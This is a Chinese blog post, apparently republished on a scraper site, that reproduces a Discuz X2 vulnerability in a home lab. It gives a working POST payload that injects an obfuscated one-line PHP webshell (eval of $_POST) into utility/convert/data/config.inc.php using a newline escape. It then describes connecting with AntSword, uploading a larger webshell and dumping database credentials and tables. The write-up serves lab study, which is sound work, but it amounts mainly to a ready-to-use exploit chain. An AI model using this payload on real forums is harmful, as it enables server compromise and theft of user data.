搭建并攻破discuz靶场(复现)并且盗取数据库 您所在的位置:网站首页 如何破解论坛的付费内容限制问题 搭建并攻破discuz靶场(复现)并且盗取数据库

搭建并攻破discuz靶场(复现)并且盗取数据库

2024-01-23 01:08| 来源: 网络整理| 查看: 265

环境:Centos7,Win10

搭建环境:

一个新的Centos7虚拟机,需要搭建一个LAMP环境。 命令:yum -y install httpd mariadb-server mariadb php php-mysql(下载环境) 开启服务器和数据库 命令:systemctl start httpd,systemctl start mariadb 设置mysql数据库用户名密码:mysql -u root -p 123456 注意:这里我之前设置过密码,但是我忘了,淦! 解决办法:解决 VIM:点错了,命令框:U,撤销所有修改(第二次)。 解压:Discuz_X2_SC_UTF8.zip到对应路径下,在upload路径下直接打开无脑下一步就完事了。成功后有这个界面。 在这里插入图片描述漏洞概述: 这漏洞出现在一个DZ X系列自带的转换工具里面。 漏洞路径:utility/convert/data/config.inc.php 漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,无任何过滤检测,所以黑客可以通过post方式往config.inc.php中写木马程序。 触发漏洞过程: 1、在浏览器中访问打开 http://192.168.1.63/utility/convert/index.php 2、使用/utility/convert/index.php进行版本转换时,会自动创建utility/convert/data/config.inc.php文件。 3、config.inc.php文件没有做过滤,黑客可以使用post方法对config.inc.php注入木马程序 。

步骤: 漏洞出现在这个路径下/utility/convert/。随便点一个版本,用bp抓包。因为:它会把你选择的版本信息传到服务器,服务器会保存数据生成一个新的配置文件,这里就可以使用写入木马使其保存在新的配置文件中。再用蚁剑去连接。 在这里插入图片描述把下面改成 在这里插入图片描述插入一句话木马:newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes 源码:newconfig[aaa eval(eval("$_POST[c];"););//]=aaaa&submit=yes 在这里插入图片描述成功: 在这里插入图片描述那么我们传入的语句是什么意思呢? 打开如下路径会发现多了一个配置文件,查看。 在这里插入图片描述在这里插入图片描述 发现了:$_config[‘source’][‘dbhost’] = ‘localhost’;中source值会被写进SOURCE ----------------- // 所以我们用aaa去替换了并且用换行符去逃逸后面的一句话木马。

最后用蚁剑去连接: 在这里插入图片描述连接成功之后我们可以去上传一个大马: 在这里插入图片描述通过大马可以查看信息,甚至获取数据库密码再去连接数据库。 在这里插入图片描述在这里插入图片描述

在这里插入图片描述打印数据库表: 在这里插入图片描述 总结: 主要利用了升级版本时会向服务器传入配置的服务器信息,服务器接受后会保存信息并生成新的配置文件。还把传入的source值写在注释中,这导致我们可以使用换行符去逃逸后面的代码。



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有